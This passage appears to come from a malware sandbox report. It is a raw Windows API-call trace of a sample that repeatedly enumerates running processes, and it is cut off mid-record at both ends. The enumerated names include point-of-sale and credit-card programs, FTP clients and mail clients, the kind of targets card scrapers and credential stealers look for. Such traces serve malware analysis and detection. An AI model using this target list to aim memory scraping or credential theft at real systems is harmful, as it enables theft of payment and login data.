th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0205.773] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0205.775] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0205.781] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0205.782] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0205.784] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0205.786] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0205.788] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0205.790] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0205.792] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0205.796] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x108c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="discussion.exe")) returned 1 [0205.798] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="styledesignbusiness.exe")) returned 1 [0205.800] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="new_door.exe")) returned 1 [0205.802] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bed fight.exe")) returned 1 [0205.804] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="federal hotel.exe")) returned 1 [0205.805] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0205.821] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0205.824] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0205.826] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xccc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x500, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 1 [0205.828] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xccc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x500, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 0 [0205.829] CloseHandle (hObject=0x11cc) returned 1 [0205.829] Sleep (dwMilliseconds=0x64) [0205.933] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x11cc [0205.953] Process32First (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0205.956] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x73, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0205.958] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0205.960] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0205.962] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0205.968] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0205.970] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0205.972] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0205.975] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0205.977] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0205.979] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0206.034] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0206.036] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x46, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0206.038] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0206.040] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0206.046] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0206.048] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0206.050] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0206.052] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0206.055] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0206.062] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0206.064] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0206.066] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0206.068] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0206.070] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0206.123] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0206.125] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0206.127] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0206.129] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0206.130] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0206.132] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0206.133] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0206.136] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x670, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0206.140] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x428, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="degree_sing_pretty.exe")) returned 1 [0206.142] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="work-heavy.exe")) returned 1 [0206.144] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0206.145] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="real-new.exe")) returned 1 [0206.147] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="letter.exe")) returned 1 [0206.148] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="lightwhere.exe")) returned 1 [0206.150] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge_model_ready.exe")) returned 1 [0206.151] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fearfew.exe")) returned 1 [0206.156] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bag-begin-gas.exe")) returned 1 [0206.158] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="take whether.exe")) returned 1 [0206.159] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="common trade station.exe")) returned 1 [0206.161] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xda8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="small_money.exe")) returned 1 [0206.163] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="magazineofficialteach.exe")) returned 1 [0206.165] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="involve.exe")) returned 1 [0206.181] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="religious_free_generation.exe")) returned 1 [0206.187] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hair friend will.exe")) returned 1 [0206.189] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whose.exe")) returned 1 [0206.191] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0206.192] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0206.194] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0206.195] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0206.197] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0206.201] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0206.203] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0206.205] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0206.207] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0206.209] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0206.211] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0206.213] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0206.218] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0206.220] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, 